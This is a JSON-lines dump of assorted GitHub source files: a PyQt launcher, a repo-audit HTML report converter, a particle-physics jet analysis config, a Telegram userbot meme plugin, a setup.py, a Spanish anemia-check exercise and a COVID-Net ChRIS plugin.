max(target.values())\n","repo_name":"hanelliotn/leetcode","sub_path":"02190-MostFrequentNumberFollowingKeyInAnArray.py","file_name":"02190-MostFrequentNumberFollowingKeyInAnArray.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"34161446949","text":" # -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 30 20:51:29 2020\n\n@author: aylin\n\"\"\"\nimport sys\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom uygulamakod import MainWindow\n\ndef main():\n app = QtWidgets.QApplication(sys.argv)\n mainWindow = MainWindow()\n mainWindow.show()\n sys.exit(app.exec_())\nif __name__ == \"__main__\":\n main()","repo_name":"muhendishanimm/Goruntu-isleme","sub_path":"uygulamamain.py","file_name":"uygulamamain.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33927874248","text":"# SPDX-License-Identifier: Apache-2.0\n# Licensed to the Ed-Fi Alliance under one or more agreements.\n# The Ed-Fi Alliance licenses this file to you under the Apache License, Version 2.0.\n# See the LICENSE and NOTICES files in the project root for more information.\n\n# This is a stand-alone script for converting JSON output files to HTML\n\nfrom datetime import datetime\nimport json\nimport os\nfrom typing import Dict, List\n\n# Enable running from this directory or from parent\nDIRECTORY = \"../reports\" if os.path.exists(\"../reports\") else \"reports\"\n\n\ndef convert(file_name: str, file_contents: str, lines: List[str]) -> List[str]:\n file_name = file_name.split(\".\")[0]\n lines.append(f\"

{file_name}

\")\n\n doc: Dict[str, dict] = json.loads(file_contents)\n for repository in doc.keys():\n lines.append(f\"

{repository}

\")\n repo_data: dict = doc[repository]\n score: int = repo_data[\"score\"]\n result: str = repo_data[\"result\"]\n\n if result == \"OK\":\n lines.append(f\"

🟢 Score: {score}\")\n else:\n lines.append(f\"

🔴 Score: {score}\")\n\n lines.append(\"

Findings:

\")\n lines.append(\"
    \")\n description: Dict[str, str] = repo_data[\"description\"]\n for key in description.keys():\n value = description[key]\n if value == \"OK\":\n continue\n else:\n lines.append(f\"
  • {key}: {value}\")\n lines.append(\"
\")\n\n return lines\n\n\ndef read_files() -> str:\n lines: List[str] = []\n\n for file_entry in os.scandir(f\"{DIRECTORY}\"):\n if file_entry.is_file() and file_entry.name.endswith(\".json\"):\n with open(file_entry.path) as f:\n lines = convert(file_entry.path, f.read(), lines)\n\n return \"\\n\".join(lines)\n\n\ndef write_consolidated_file(contents: str) -> None:\n now = datetime.strftime(datetime.now(), \"%Y-%m-%d-%H-%M-%S\")\n with open(f\"{DIRECTORY}/{now}.html\", mode=\"w\", encoding=\"utf-8\") as f:\n f.write(\n f\"\"\"\n\n\n Consolidated Repo Scan, {datetime.now()}\n\n\n{contents}\n\n\n\"\"\"\n )\n\n\ndef convert_to_html():\n contents = read_files()\n write_consolidated_file(contents)\n\n\nif __name__ == \"__main__\":\n convert_to_html()\n","repo_name":"Ed-Fi-Alliance-OSS/DevSecOps","sub_path":"edfi-repo-auditor/edfi_repo_auditor/html_report.py","file_name":"html_report.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74947685984","text":"from UWVV.AnalysisTools.AnalysisFlowBase import AnalysisFlowBase\nimport FWCore.ParameterSet.Config as cms\nfrom PhysicsTools.PatAlgos.tools.jetTools import updateJetCollection\nfrom UWVV.Utilities.helpers import UWVV_BASE_PATH\nimport os\nfrom os import path\nimport pdb\n\nclass JetBaseFlow(AnalysisFlowBase):\n def __init__(self, *args, **kwargs):\n if not hasattr(self, 'isMC'):\n self.isMC = kwargs.pop('isMC', True)\n if not hasattr(self, 'year'):\n self.year = kwargs.pop('year', '2016')\n if not hasattr(self, 'runningLocal'):\n self.runningLocal = kwargs.pop('runningLocal', False)\n super(JetBaseFlow, self).__init__(*args, **kwargs)\n\n def makeAnalysisStep(self, stepName, **inputs):\n step = super(JetBaseFlow, self).makeAnalysisStep(stepName, **inputs)\n \n LeptonSetup = cms.string(self.year)\n cmsswversion=os.environ['CMSSW_VERSION']\n\n if stepName == 'preliminary':\n # Pileup veto\n # This puts the IDs in the event stream, not an updated\n # jet collection\n self.process.load(\"RecoJets.JetProducers.PileupJetID_cfi\")\n self.process.pileupJetIdUpdated = self.process.pileupJetId.clone(\n jets = step.getObjTag('j'),\n inputIsCorrected = True,\n applyJec = True,\n vertexes = step.getObjTag('v'),\n )\n step.addModule('pileupJetIdUpdated',\n self.process.pileupJetIdUpdated,\n 'puID', puID='fullId')\n \n '''if LeptonSetup==\"2018\":\n sqlitePath = '{0}.db'.format('Autumn18_V16_MC' if self.isMC else 'Autumn18_RunABCD_V19_DATA')\n pdb.set_trace()\n #dbPath = 'sqlite_file:' + path.join(UWVV_BASE_PATH, 'data', \n # sqlitePath)\n #sqlitePath = '{0}/src/UWVV/data/{1}.db'.format(cmsswversion,'Autumn18_V16_MC' if self.isMC else 'Autumn18_RunABCD_V16_DATA' )\n if self.runningLocal:\n sqPath = '{0}.db'.format('Autumn18_V16_MC' if self.isMC else 'Autumn18_RunABCD_V19_DATA')\n sqlitePath = path.join(UWVV_BASE_PATH, 'data', \n sqPath)\n print \"Running Locally\"\n \n dbPath = 'sqlite:' + sqlitePath\n \n JECtag=\"JetCorrectorParametersCollection_Autumn18_RunABCD_V16_DATA_AK4PFchs\"\n if self.isMC:\n JECtag=\"JetCorrectorParametersCollection_Autumn18_V16_MC_AK4PFchs\"\n #print \"JECtag: \",JECtag\n\n self.process.load(\"CondCore.CondDB.CondDB_cfi\")\n # Use this version to get it from a local db file\n #dbPath = 'sqlite:' + path.join(UWVV_BASE_PATH, 'data', \n # sqlitePath)\n print \"dbPath: \",dbPath\n JECDBESSource = cms.ESSource(\n \"PoolDBESSource\",\n self.process.CondDB,\n #DBParameters = cms.PSet(messageLevel = cms.untracked.int32(0)),\n #timetype = cms.string('runnumber'),\n toGet = cms.VPSet(cms.PSet(record = cms.string('JetCorrectionsRecord'),\n tag = cms.string(JECtag),\n label = cms.untracked.string('AK4PFchs')\n )\n ),\n #connect = cms.string(dbPath)\n )\n\n JECDBESSource.connect = cms.string(dbPath)\n\n step.addModule('JECDBESSource', JECDBESSource)\n \n self.process.es_prefer_jec = cms.ESPrefer('PoolDBESSource', 'JECDBESSource')'''\n\n\n # Jet energy corrections\n corrections = ['L1FastJet', 'L2Relative', 'L3Absolute',]\n if not self.isMC:\n corrections.append('L2L3Residual')\n updateJetCollection(\n self.process,\n jetSource = step.getObjTag('j'),\n labelName = 'UpdatedJEC',\n jetCorrections = ('AK4PFchs', cms.vstring(corrections), 'None'),\n )\n\n # Store PU ID in jet collection as a userInt\n self.process.updatedPatJetsUpdatedJEC.userData.userInts.src += [step.getObjTagString('puID')]\n\n self.process.jecSequence = cms.Sequence(\n self.process.patJetCorrFactorsUpdatedJEC\n * self.process.updatedPatJetsUpdatedJEC\n )\n step.addModule('jecSequence',\n self.process.jecSequence,\n 'j')\n\n if self.isMC:\n # shift corrections up and down for systematics\n jesShifts = cms.EDProducer(\n \"PATJetEnergyScaleShifter\",\n src = step.getObjTag('j'),\n )\n step.addModule('jesShifts', jesShifts, 'j_jesUp', 'j_jesDown',\n j_jesUp='jesUp', j_jesDown='jesDown')\n\n if self.isMC:\n patJetGenJetMatch = cms.EDProducer(\"GenJetMatcher\", # cut on deltaR; pick best by deltaR\n src = step.getObjTag('j'), # RECO jets (any View is ok)\n matched = cms.InputTag(\"slimmedGenJets\"), # GEN jets (must be GenJetCollection)\n mcPdgId = cms.vint32(), # n/a\n mcStatus = cms.vint32(), # n/a\n checkCharge = cms.bool(False), # n/a\n maxDeltaR = cms.double(0.4), # Minimum deltaR for the match\n #maxDPtRel = cms.double(3.0), # Minimum deltaPt/Pt for the match (not used in GenJetMatcher)\n resolveAmbiguities = cms.bool(True), # Forbid two RECO objects to match to the same GEN object\n resolveByMatchQuality = cms.bool(False), # False = just match input in order; True = pick lowest deltaR pair first\n )\n \n step.addModule(\"patJetGenJetMatch\",patJetGenJetMatch) #store RECO/gen jet association in the event\n\n #Print jet information\n #jetMatchViewerMy = cms.EDAnalyzer('JetMatchViewerMy',src=step.getObjTag('j'),match=cms.InputTag(\"patJetGenJetMatch\"),\n #tag=cms.string(step.getObjTagString('j')+'/after PUJetIDUpdated')\n # )\n #step.addModule('jetMatchViewerMy',jetMatchViewerMy)\n\n jsfFileP = path.join(UWVV_BASE_PATH, 'data', 'jetPUSF',\n 'scalefactorsPUID_81Xtraining.root')\n\n jeffFileP = path.join(UWVV_BASE_PATH, 'data', 'jetPUSF',\n 'effcyPUID_81Xtraining.root')\n \n jsfhist = \"h2_eff_sf%s_T\"%(int(self.year))\n jeffhist = \"h2_eff_mc%s_T\"%(int(self.year))\n\n jetIDEmbedding = cms.EDProducer(\n \"PATJetIDEmbedder\",\n src = step.getObjTag('j'),\n setup = cms.int32(int(self.year)),\n domatch = cms.bool(self.isMC),\n #jsfFile = cms.string(jsfFileP),\n #jeffFile = cms.string(jeffFileP),\n #SFhistName = cms.string(jsfhist),\n #effhistName = cms.string(jeffhist),\n )\n step.addModule('jetIDEmbedding', jetIDEmbedding, 'j') #,j=\"normaljet\") #produce jet and SF mulfac, distinguish jet with extra tag\n\n if self.isMC:\n \n\n jetIDEmbedding_jesUp = cms.EDProducer(\n \"PATJetIDEmbedder\",\n src = step.getObjTag('j_jesUp'),\n setup = cms.int32(int(self.year)),\n )\n step.addModule('jetIDEmbeddingJESUp', jetIDEmbedding_jesUp, 'j_jesUp')\n jetIDEmbedding_jesDown = cms.EDProducer(\n \"PATJetIDEmbedder\",\n src = step.getObjTag('j_jesDown'),\n setup = cms.int32(int(self.year)),\n )\n step.addModule('jetIDEmbeddingJESDown', jetIDEmbedding_jesDown, 'j_jesDown')\n\n\n jetSmearing = cms.EDProducer(\n \"PATJetSmearing\",\n src = step.getObjTag('j'),\n rhoSrc = cms.InputTag(\"fixedGridRhoFastjetAll\"),\n systematics = cms.bool(True),\n )\n step.addModule(\"jetSmearing\", jetSmearing, 'j', 'j_jerUp',\n 'j_jerDown', j_jerUp='jerUp', j_jerDown='jerDown')\n\n jetSmearing_jesUp = jetSmearing.clone(src = step.getObjTag('j_jesUp'),\n systematics = cms.bool(False))\n step.addModule(\"jetSmearingJESUp\", jetSmearing_jesUp, 'j_jesUp')\n jetSmearing_jesDown = jetSmearing.clone(src = step.getObjTag('j_jesDown'),\n systematics = cms.bool(False))\n step.addModule(\"jetSmearingJESDown\", jetSmearing_jesDown, 'j_jesDown')\n\n # need to re-sort now that we're calibrated\n jSort_jesUp = cms.EDProducer(\n \"PATJetCollectionSorter\",\n src = step.getObjTag('j_jesUp'),\n function = cms.string('pt'),\n )\n step.addModule('jetSortingJESUp', jSort_jesUp, 'j_jesUp')\n\n jSort_jesDn = cms.EDProducer(\n \"PATJetCollectionSorter\",\n src = step.getObjTag('j_jesDown'),\n function = cms.string('pt'),\n )\n step.addModule('jetSortingJESDn', jSort_jesDn, 'j_jesDown')\n\n jSort_jerUp = cms.EDProducer(\n \"PATJetCollectionSorter\",\n src = step.getObjTag('j_jerUp'),\n function = cms.string('pt'),\n )\n step.addModule('jetSortingJERUp', jSort_jerUp, 'j_jerUp')\n\n jSort_jerDn = cms.EDProducer(\n \"PATJetCollectionSorter\",\n src = step.getObjTag('j_jerDown'),\n function = cms.string('pt'),\n )\n step.addModule('jetSortingJERDn', jSort_jerDn, 'j_jerDown')\n\n # need to re-sort now that we're calibrated\n jSort = cms.EDProducer(\n \"PATJetCollectionSorter\",\n src = step.getObjTag('j'),\n function = cms.string('pt'),\n )\n step.addModule('jetSorting', jSort, 'j')\n\n if stepName == 'preselection':\n # For now, we're not using the PU ID, but we'll store it in the\n # ntuples later\n selectionString = ('pt > 30. && abs(eta) < 4.7 && '\n 'userFloat(\"idTight\") > 0.5 && (userInt(\"{}\") >= 0||pt>50.)').format(step.getObjTagString('puID'))\n \n selectionString2 = ('pt > 30. && abs(eta) < 4.7 && '\n 'userFloat(\"idTight\") > 0.5 && (userInt(\"{}\") >= 7||pt>50.)').format(step.getObjTagString('puID'))\n\n # # use medium PU ID\n # # PU IDs are stored as a userInt where the first three digits are\n # # tight, medium, and loose PUID decisions (going right to left)\n # selectionString = ('pt>30. && abs(eta) < 4.7 && '\n # 'userFloat(\"idLoose\") > 0.5 && '\n # 'userInt(\"{}\") >= 6').format(step.getObjTagString('puID'))\n if self.isMC:\n step.addBasicSelector('j', selectionString) #not apply PU id here in order to calculate PU SF multiplication factor\n else:\n step.addBasicSelector('j', selectionString2)\n if self.isMC:\n step.addBasicSelector('j_jesUp', selectionString2)\n step.addBasicSelector('j_jesDown', selectionString2)\n step.addBasicSelector('j_jerUp', selectionString2)\n step.addBasicSelector('j_jerDown', selectionString2)\n\n return step\n\n\n\n\n\n\n","repo_name":"hhe62/UWVV","sub_path":"AnalysisTools/python/templates/JetBaseFlow.py","file_name":"JetBaseFlow.py","file_ext":"py","file_size_in_byte":12477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74346614942","text":"import asyncio\nimport random\nimport re\nimport time\nfrom random import choice, randint\nfrom collections import deque\nfrom telethon import events\nimport requests\n\nfrom telethon.tl.functions.users import GetFullUserRequest\nfrom telethon.tl.types import MessageEntityMentionName\n\n\nfrom userbot import CMD_HELP\nfrom userbot.utils import register\n\n@register(outgoing=True, pattern=\"^.fp$\")\nasync def facepalm(e):\n \"\"\" Facepalm 🤦‍♂ \"\"\"\n await e.edit(\"🤦‍♂\")\n\n@register(outgoing=True, pattern=\"^.corona$\")\nasync def iqless(e):\n await e.edit(\"Antivirus scan was completed \\n⚠️ Warning! This donkey has Corona Virus\")\n\n\n@register(outgoing=True, pattern=\"^.ggl (.*)\")\nasync def let_me_google_that_for_you(lmgtfy_q):\n textx = await lmgtfy_q.get_reply_message()\n qry = lmgtfy_q.pattern_match.group(1)\n if qry:\n query = str(qry)\n elif textx:\n query = textx\n query = query.message\n query_encoded = query.replace(\" \", \"+\")\n lfy_url = f\"http://lmgtfy.com/?s=g&iie=1&q={query_encoded}\"\n payload = {'format': 'json', 'url': lfy_url}\n r = requests.get('http://is.gd/create.php', params=payload)\n await lmgtfy_q.edit(f\"Tap this blue, help yourself.\\\n \\n[{query}]({r.json()['shorturl']})\")\n\n\n@register(pattern=r\".scam(?: |$)(.*)\", outgoing=True)\nasync def scam(event):\n \"\"\" Just a small command to fake chat actions for fun !! \"\"\"\n options = [\n 'typing', 'contact', 'game', 'location', 'voice', 'round', 'video',\n 'photo', 'document', 'cancel'\n ]\n input_str = event.pattern_match.group(1)\n args = input_str.split()\n if len(args) == 0: # Let bot decide action and time\n scam_action = choice(options)\n scam_time = randint(30, 60)\n elif len(args) == 1: # User decides time/action, bot decides the other.\n try:\n scam_action = str(args[0]).lower()\n scam_time = randint(30, 60)\n except ValueError:\n scam_action = choice(options)\n scam_time = int(args[0])\n elif len(args) == 2: # User decides both action and time\n scam_action = str(args[0]).lower()\n scam_time = int(args[1])\n else:\n await event.edit(\"`Invalid Syntax !!`\")\n return\n try:\n if (scam_time > 0):\n await event.delete()\n async with event.client.action(event.chat_id, scam_action):\n await sleep(scam_time)\n except BaseException:\n return\n\n\n@register(outgoing=True, pattern=\"^.fail$\")\nasync def fail(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"`\\n▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ `\" \n \"`\\n████▌▄▌▄▐▐▌█████ `\" \n \"`\\n████▌▄▌▄▐▐▌▀████ `\" \n \"`\\n▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ `\") \n\n\n@register(outgoing=True, pattern=\"^.loal$\")\nasync def lol(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"`\\n╱┏┓╱╱╱╭━━━╮┏┓╱╱╱╱ `\" \n \"`\\n╱┃┃╱╱╱┃╭━╮┃┃┃╱╱╱╱ `\" \n \"`\\n╱┃┗━━┓┃╰━╯┃┃┗━━┓╱ `\" \n \"`\\n╱┗━━━┛╰━━━╯┗━━━┛╱ `\") \n \n \n \n@register(outgoing=True, pattern=\"^.lool$\")\nasync def lool(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"`\\n╭╭━━━╮╮┈┈┈┈┈┈┈┈┈┈\\n┈┃╭━━╯┈┈┈┈▕╲▂▂╱▏┈\\n┈┃┃╱▔▔▔▔▔▔▔▏╱▋▋╮┈`\"\n \"`\\n┈┃╰▏┃╱╭╮┃╱╱▏╱╱▆┃┈\\n┈╰━▏┗━╰╯┗━╱╱╱╰┻┫┈\\n┈┈┈▏┏┳━━━━▏┏┳━━╯┈`\"\n \"`\\n┈┈┈▏┃┃┈┈┈┈▏┃┃┈┈┈┈ `\")\n \n\n\n\n@register(outgoing=True, pattern=\"^.nih$\")\nasync def nih(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"`\\n(\\_/)`\"\n \"`\\n(•_•)`\"\n \"`\\n >🌹 *`\"\n \"`\\n `\"\n \"`\\n(\\_/)`\"\n \"`\\n(•_•)`\"\n \"`\\n🌹<\\ *`\") \n\n\n@register(outgoing=True, pattern=\"^.ml(?: |$)(.*)\")\nasync def gtfo(e):\n message = e.pattern_match.group(1)\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"`\\n█████████`\" \n \"`\\n█▄█████▄█`\" \n \"`\\n█▼▼▼▼▼`\" \n f\"`\\n█ {message}`\"\n \"`\\n█▲▲▲▲▲`\"\n \"`\\n█████████`\"\n \"`\\n ██ ██`\") \n\n\n@register(outgoing=True, pattern=\"^.taco$\") \nasync def taco(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"\\n{\\__/}\"\n \"\\n(●_●)\"\n \"\\n( >🌮 Want a taco?\")\n\n\n@register(outgoing=True, pattern=\"^.paw$\") \nasync def paw(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"`(=ↀωↀ=)\")\n\n\n@register(outgoing=True, pattern=\"^.tf$\") \nasync def tf(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"(̿▀̿ ̿Ĺ̯̿̿▀̿ ̿)̄ \") \n \n\n@register(outgoing=True, pattern=\"^.gay$\") \nasync def gey(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"`\\n┈┈┈╭━━━━━╮┈┈┈┈┈\\n┈┈┈┃┊┊┊┊┊┃┈┈┈┈┈`\"\n \"`\\n┈┈┈┃┊┊╭━╮┻╮┈┈┈┈\\n┈┈┈╱╲┊┃▋┃▋┃┈┈┈┈\\n┈┈╭┻┊┊╰━┻━╮┈┈┈┈`\"\n \"`\\n┈┈╰┳┊╭━━━┳╯┈┈┈┈\\n┈┈┈┃┊┃╰━━┫┈U GAY`\"\n \"\\n┈┈┈┈┈┈┏━┓┈┈┈┈┈┈\") \n\n\n@register(outgoing=True, pattern=\"^.bot$\")\nasync def bot(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"` \\n ╲╲╭━━━━╮ \\n╭╮┃▆┈┈▆┃╭╮ \\n┃╰┫▽▽▽┣╯┃ \\n╰━┫△△△┣━╯`\"\n \"`\\n╲╲┃┈┈┈┈┃ \\n╲╲┃┈┏┓┈┃ `\")\n\n\n@register(outgoing=True, pattern=\"^.hai$\")\nasync def hey(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"\\n┈┈┈╱▔▔▔▔╲┈╭━━━━━\\n┈┈▕▂▂▂▂▂��▏┃HELLO!┊😀`\"\n \"`\\n┈┈▕▔▇▔▔┳▔▏╰┳╮HELLO!┊\\n┈┈▕╭━╰╯━╮▏━╯╰━━━\\n╱▔▔▏▅▅▅▅▕▔▔╲┈┈┈┈`\"\n \"`\\n▏┈┈╲▂▂▂▂╱┈┈┈▏┈┈┈`\")\n\n\n@register(outgoing=True, pattern=\"^.nou$\")\nasync def nou(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(\"`\\n┈╭╮╭╮\\n┈┃┃┃┃\\n╭┻┗┻┗╮`\"\n \"`\\n┃┈▋┈▋┃\\n┃┈╭▋━╮━╮\\n┃┈┈╭╰╯╰╯╮`\"\n \"`\\n┫┈┈ NoU\\n┃┈╰╰━━━━╯`\"\n \"`\\n┗━━┻━┛`\")\n\n@register(outgoing=True, pattern=\"^.sayhi$\")\nasync def shalom(e):\n await e.edit(\n \"\\n💛💛💛💛💛💛💛💛💛\"\n \"\\n💛🔷🔷🔷🔷🔷🔷🔷💛\"\n \"\\n💛💛💛💛🔷💛💛💛💛\"\n \"\\n💛💛💛💛🔷💛💛💛💛\"\n \"\\n💛💛💛💛🔷💛💛💛💛\"\n \"\\n💛🔷🔷🔷🔷️🔷🔷🔷💛\"\n \"\\n💛💛💛💛💛💛💛💛💛\"\n \"\\n💛💛💛💛💛💛💛💛💛\"\n \"\\n💛🔷💛💛️💛💛💛🔷💛\"\n \"\\n💛🔷🔷🔷🔷🔷🔷🔷💛\"\n \"\\n💛🔷🔷🔷🔷🔷🔷️🔷💛\"\n \"\\n💛🔷💛💛💛💛️💛🔷💛\"\n \"\\n💛💛💛💛💛💛💛💛💛\")\n\n","repo_name":"Speedevs/J.A.R.V.I.S-Userbot","sub_path":"userbot/plugins/memes2.py","file_name":"memes2.py","file_ext":"py","file_size_in_byte":8354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"29768687859","text":"from setuptools import setup, find_packages\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='covicdbtools',\n version='0.0.1',\n description='A sample Python project',\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/jamesaoverton/covic-db-tool-prototype',\n author='James A. Overton',\n author_email='james@overton.ca',\n classifiers=[ # Optional\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Developers',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n ],\n package_dir={'': 'src'},\n packages=find_packages(where='src'),\n python_requires='>=3.6, <4',\n install_requires=['jinja2', 'openpyxl', 'pyyaml', 'tabulate', 'gitpython'],\n entry_points={\n \"console_scripts\": [\n \"cvdb = covicdbtools.cli:main\",\n ],\n },\n)\n","repo_name":"jamesaoverton/covic-db-tool-prototype","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41855828948","text":"#Tomando como base los resultados obtenidos en un laboratorio de análisis clínicos, un médico determina \n#si una persona tiene anemia o no, lo cual depende de su nivel de hemoglobina en la sangre, de su edad y de su sexo. \n#Si el nivel de hemoglobina que tiene una persona es menor que el rango que le corresponde, se determina su resultado \n#como positivo y en caso contrario como negativo. La tabla en la que el médico se basa para obtener el resultado es la \n#siguiente:\n\nnivelHem = int(input(\"Cual es el nivel de hemogoblina del paciente? \"))\nunidad = input(\"El paciente tiene más de un año? (si) (no)\")\n\nif unidad == \"no\":\n\tedad = int(input(\"Cuantos meses tiene? \"))\n\tif edad > 0 and edad <= 1:\n\t\trangoMin = 13\n\telif edad > 1 and edad <= 6:\n\t\trangoMin = 10\n\telif edad > 6 and edad <= 12:\n\t\trangoMin = 11\nelse:\n\tedad = int(input(\"Cuantos años tiene? \"))\n\tif edad > 1 and edad <= 5:\n\t\trangoMin = 11.5\n\telif edad > 5 and edad <= 10:\n\t\trangoMin = 12.6\n\telif edad > 10 and edad <= 15:\n\t\trangoMin = 13\n\telse:\n\t\tgenero = input(\"Es hombre (h) o mujer (m)? \")\n\t\tif genero == \"mujer\":\n\t\t\trangoMin = 12\n\t\telse:\n\t\t\trangoMin = 14\n\nif nivelHem < rangoMin:\n\tprint(\"El paciente sufre de anemia\")\nelse:\n\tprint(\"El paciente está sano\")\n","repo_name":"ArturoRuge/python-exercises","sub_path":"condicionales/3-12.py","file_name":"3-12.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24326849985","text":"#\n# topo_covidnet ds ChRIS plugin app\n#\n# (c) 2021 Fetal-Neonatal Neuroimaging & Developmental Science Center\n# Boston Children's Hospital\n#\n# http://childrenshospital.org/FNNDSC/\n# dev@babyMRI.org\n#\n\nfrom chrisapp.base import ChrisApp\nimport os\nimport sys\nfrom .inference import Inference\n\nGstr_title = \"\"\"\n _ _ _ _ \n| | (_) | | | | \n| |_ ___ _ __ ___ ___ _____ ___ __| |_ __ ___| |_ \n| __/ _ \\| '_ \\ / _ \\ / __/ _ \\ \\ / / |/ _` | '_ \\ / _ \\ __|\n| || (_) | |_) | (_) | (_| (_) \\ V /| | (_| | | | | __/ |_ \n \\__\\___/| .__/ \\___/ \\___\\___/ \\_/ |_|\\__,_|_| |_|\\___|\\__|\n | | ______ \n |_| |______| \n\"\"\"\n\nGstr_synopsis = \"\"\"\n\n(Edit this in-line help for app specifics. At a minimum, the \nflags below are supported -- in the case of DS apps, both\npositional arguments and ; for FS and TS apps\nonly -- and similarly for directories\nwhere necessary.)\n\n NAME\n\n topo_covidnet.py \n\n SYNOPSIS\n\n python topo_covidnet.py \\\\\n [-h] [--help] \\\\\n [--json] \\\\\n [--man] \\\\\n [--meta] \\\\\n [--savejson ] \\\\\n [-v ] [--verbosity ] \\\\\n [--version] \\\\\n \\\\\n \n\n BRIEF EXAMPLE\n\n * Bare bones execution\n\n docker run --rm -u $(id -u) \\\n -v $(pwd)/in:/incoming -v $(pwd)/out:/outgoing \\\n fnndsc/pl-topo_covidnet topo_covidnet \\\n /incoming /outgoing\n\n DESCRIPTION\n\n `topo_covidnet.py` ...\n\n ARGS\n\n [-h] [--help]\n If specified, show help message and exit.\n \n [--json]\n If specified, show json representation of app and exit.\n \n [--man]\n If specified, print (this) man page and exit.\n\n [--meta]\n If specified, print plugin meta data and exit.\n \n [--savejson ] \n If specified, save json representation file to DIR and exit. \n \n [-v ] [--verbosity ]\n Verbosity level for app. Not used currently.\n \n [--version]\n If specified, print version number and exit. \n\"\"\"\n\n\nclass Topo_covidnet(ChrisApp):\n \"\"\"\n An app to work with TS plugins\n \"\"\"\n PACKAGE = __package__\n TITLE = 'A copy of COVIDNET to work on TS plugins'\n CATEGORY = ''\n TYPE = 'ds'\n ICON = '' # url of an icon image\n MIN_NUMBER_OF_WORKERS = 1 # Override with the minimum number of workers as int\n MAX_NUMBER_OF_WORKERS = 1 # Override with the maximum number of workers as int\n MIN_CPU_LIMIT = 1000 # Override with millicore value as int (1000 millicores == 1 CPU core)\n MIN_MEMORY_LIMIT = 200 # Override with memory MegaByte (MB) limit as int\n MIN_GPU_LIMIT = 0 # Override with the minimum number of GPUs as int\n MAX_GPU_LIMIT = 0 # Override with the maximum number of GPUs as int\n OUTPUT_META_DICT = {}\n\n def define_parameters(self):\n \"\"\"\n Arguments accepted by plugin\n \"\"\"\n self.add_argument('--parInst',\n \tdest = 'parInst',\n \ttype = str,\n \toptional = True,\n \thelp = 'Parent instance ID',\n default = 'patient_folder')\n self.add_argument('--metaname', \n dest = 'metaname', \n type = str, \n optional = True,\n help = 'Name of ckpt meta file',\n default = 'model.meta')\n self.add_argument('--imagefile', \n dest = 'imagefile', \n type = str, \n optional = False,\n help = 'Name of image file to infer from')\n self.add_argument('--in_tensorname', \n dest = 'in_tensorname', \n type = str, \n optional = True,\n help = 'Name of input tensor to graph',\n default = 'input_1:0')\n self.add_argument('--out_tensorname', \n dest = 'out_tensorname', \n type = str, \n optional = True,\n help = 'Name of output tensor from graph',\n default = 'norm_dense_1/Softmax:0')\n self.add_argument('--input_size', \n dest = 'input_size', \n type = int, \n optional = True,\n help = 'Size of input (ex: if 480x480, --input_size 480)',\n default = 480)\n self.add_argument('--top_percent', \n dest = 'top_percent', \n type = float, \n optional = True,\n help = 'Percent top crop from top of image',\n default = 0.08)\n\n def run(self, options):\n \"\"\"\n Define the code to be run by this plugin app.\n \"\"\"\n print(Gstr_title)\n print('Version: %s' % self.get_version())\n all_three_models = [\n # {\n # 'weightspath':'/models/COVIDNet-CXR3-A',\n # 'ckptname':'model-2856',\n # 'modelused':'modelA'\n # }, \n {\n 'weightspath':'/usr/local/lib/covidnet/COVIDNet-CXR4-B',\n 'ckptname':'model-1545',\n 'modelused':'modelB'\n },\n # {\n # 'weightspath': '/models/COVIDNet-CXR3-C',\n # 'ckptname':'model-0',\n # 'modelused':'modelC'\n # }\n ]\n for model in all_three_models:\n options.weightspath =model['weightspath']\n options.ckptname = model['ckptname']\n options.modelused = model['modelused']\n infer_obj = Inference(options)\n infer_obj.infer()\n\n def show_man_page(self):\n \"\"\"\n Print the app's man page.\n \"\"\"\n 